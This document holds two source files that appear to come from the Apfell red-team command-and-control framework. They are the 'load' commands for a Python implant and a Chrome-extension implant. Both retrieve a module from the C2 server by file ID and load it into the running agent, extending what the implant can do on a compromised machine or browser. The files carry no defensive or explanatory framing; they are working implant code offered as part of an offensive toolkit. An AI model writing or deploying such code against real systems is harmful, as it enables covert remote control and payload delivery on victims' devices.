File: apfell-docker/app/payloads/viper/commands/load/load.py
def load(apfell, c2, params="", task_id=""):
    import json
    try:
        param_json = json.loads(params)
        module = c2.upload(param_json['file_id'])
        apfell.load_zip(module, param_json['cmds'])
        output = json.dumps({"user_output": "Loaded {}".format(param_json['cmds']), "completed": True})
        c2.post_response(response=output, task_id=task_id)
    except Exception as e:
        output = json.dumps({"user_output": "Failed to load module: {}".format(str(e)), "completed": True, "status": "error"})
        c2.post_response(response=output, task_id=task_id)
    apfell.remove_job(task_id)

COMMAND_ENDS_HERE

File: apfell-docker/app/payloads/chrome-extension/commands/load/load.js
exports.load = function(task) {
    // TODO: load
    try {
        let args = JSON.parse(task.parameters);
        let response = {'action':'upload','full_path':'', 'chunk_size':1024000, 'chunk_num':1,'file_id':args.file_id};
        let encodedResponse = JSON.stringify(response);
        let final = apfell.apfellid + encodedResponse;
        let msg = btoa(unescape(encodeURIComponent(final)));
        out.push(msg);
        loads.push({'type':'load','name': args.cmds,'file_id':args.file_id, 'task_id':task.id,'data':[]});
    } catch (error) {
        let response = {"task_id":task.id, "user_output":error.toString(), "completed": true, "status":"error"};
        let outer_response = {"action":"post_response", "responses":[response], "delegates":[]};
        let enc = JSON.stringify(outer_response);
        let final = apfell.apfellid + enc;
        let msg = btoa(unescape(encodeURIComponent(final)));
        out.push(msg);
    }

};
COMMAND_ENDS_HERE